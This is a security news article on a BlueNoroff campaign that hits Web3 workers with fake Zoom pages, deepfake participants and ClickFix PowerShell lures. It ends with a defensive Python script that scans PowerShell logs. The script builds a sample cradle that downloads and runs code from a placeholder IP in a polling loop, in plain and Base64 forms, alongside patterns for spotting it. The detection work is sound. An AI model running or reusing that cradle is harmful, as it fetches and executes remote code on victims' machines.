A sophisticated campaign by BlueNoroff, a subgroup of North Korea’s Lazarus Group, is targeting cryptocurrency and Web3 professionals. It combines fake Zoom meeting interfaces, fileless PowerShell scripts and AI-generated deepfake content.
BlueNoroff’s Techniques and Targets
BlueNoroff, known for its focus on financial gain through digital asset theft, has launched attacks in over 20 countries, with the United States accounting for 41% of the victims. The initial lure is a spear-phishing email in which the attackers pose as legal professionals from the fintech sector and invite the target to book a meeting via Calendly.
Once the meeting is confirmed, the legitimate Google Meet link is swapped for a look-alike Zoom URL. It leads to a fake HTML page imitating the Zoom meeting interface, complete with AI-generated participant videos and active-speaker indicators.
Execution and Impact of the Attacks
Arctic Wolf analysts traced an attack on a North American Web3 company to BlueNoroff, which is also tracked as APT38, Sapphire Sleet and Stardust Chollima. The initial compromise took only minutes, after which the attackers maintained access for more than two months, collecting browser credentials, webcam footage and other sensitive data that was then reused to craft more convincing lures.
The campaign stands out for its self-sustaining deepfake production pipeline. Researchers found nearly 950 files on the attackers’ server, including AI-generated images and deepfake videos, carrying cryptographic provenance metadata that identifies OpenAI’s GPT-4o model as their source.
During the fake meeting, victims are walked through a ClickFix-style clipboard injection: the page tells the user to update their SDK, which places hidden PowerShell commands on the clipboard for the user to paste and run. These commands install a persistent beacon that polls the attackers’ server every five seconds and gathers extensive system data.
Protective Measures and Recommendations
Organizations in the Web3, cryptocurrency and financial services sectors are advised to verify meeting links through a secondary channel before joining. Legitimate meeting platforms never require terminal commands to resolve audio or camera issues. Security teams should block the identified C2 addresses, remove suspicious shortcuts and rotate any exposed credentials.
Enabling PowerShell Script Block Logging on endpoints helps surface obfuscated payloads of this kind early. Immediate action is necessary to secure sensitive information and prevent future breaches.
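As an added illustration, not taken from the Arctic Wolf research or from this article, the Python sketch below shows the kind of triage a security team could run over Script Block Logging output (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) once it is enabled: it decodes any -EncodedCommand payload and flags the traits of a ClickFix-style cradle described above (hidden window, execution-policy bypass, download-and-Invoke-Expression, a polling loop). The sample script blocks, the 203.0.113.10 address (a documentation-range IP) and the indicator names are constructed for the example and are not campaign artifacts.

```python
import base64
import re
from typing import Dict, List, Optional, Tuple

# Indicator patterns a responder would look for in PowerShell Script Block
# Logging events (Event ID 4104). Script Block Logging is turned on by the
# policy value EnableScriptBlockLogging=1 under
# HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging.
INDICATORS: Dict[str, re.Pattern] = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "download_cradle": re.compile(
        r"\biwr\b|invoke-webrequest|\birm\b|invoke-restmethod|downloadstring|net\.webclient",
        re.I,
    ),
    "raw_ip_url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}", re.I),
    # while(...) ... Start-Sleep is the shape of a polling beacon loop.
    "beacon_loop": re.compile(r"while\s*\(.*?\).*start-sleep", re.I | re.S),
    "base64_decode": re.compile(r"frombase64string", re.I),
    "clipboard_read": re.compile(r"get-clipboard", re.I),
}

# -e / -ec / -en / -enc / -EncodedCommand followed by a Base64 blob.
ENCODED_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(script_block: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if there is none.

    PowerShell expects the argument to be Base64 of UTF-16LE text.
    """
    match = ENCODED_ARG.search(script_block)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_script_block(script_block: str) -> Dict[str, object]:
    """Flag indicators in one 4104 script block, including inside an encoded payload."""
    decoded = decode_encoded_command(script_block)
    texts = [script_block] + ([decoded] if decoded else [])
    hits = {name for text in texts for name, rx in INDICATORS.items() if rx.search(text)}
    if decoded:
        hits.add("encoded_command")
    return {"indicators": sorted(hits), "decoded": decoded}


def triage(script_blocks: List[str], threshold: int = 3) -> List[Tuple[int, List[str]]]:
    """Return (index, indicators) for blocks with at least `threshold` indicators."""
    findings = []
    for idx, block in enumerate(script_blocks):
        indicators = score_script_block(block)["indicators"]
        if len(indicators) >= threshold:
            findings.append((idx, indicators))
    return findings


# Constructed sample script-block texts (hypothetical, not real campaign code).
LURE_CMD = (
    "$c='http://203.0.113.10/sdk';"
    "while($true){try{iex (iwr $c -UseBasicParsing).Content}catch{};Start-Sleep -Seconds 5}"
)
SAMPLE_SCRIPT_BLOCKS = [
    # Benign administrative one-liner.
    "Get-ChildItem -Path C:\\Users -Recurse | Measure-Object",
    # Plain-text ClickFix-style cradle: hidden window, bypass, download, eval, poll.
    'powershell -w hidden -ep bypass -c "' + LURE_CMD + '"',
    # Same cradle hidden behind -enc (Base64 of UTF-16LE).
    "powershell -nop -w hidden -enc "
    + base64.b64encode(LURE_CMD.encode("utf-16-le")).decode("ascii"),
]

if __name__ == "__main__":
    for idx, indicators in triage(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {idx}: {', '.join(indicators)}")
```

In practice the script-block text comes from the 4104 event's ScriptBlockText field (for example via Get-WinEvent or a SIEM export); the threshold keeps a lone Invoke-WebRequest from paging anyone, while the combination of a hidden window, a download cradle and a sleep loop is what distinguishes a pasted ClickFix payload from routine administration.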
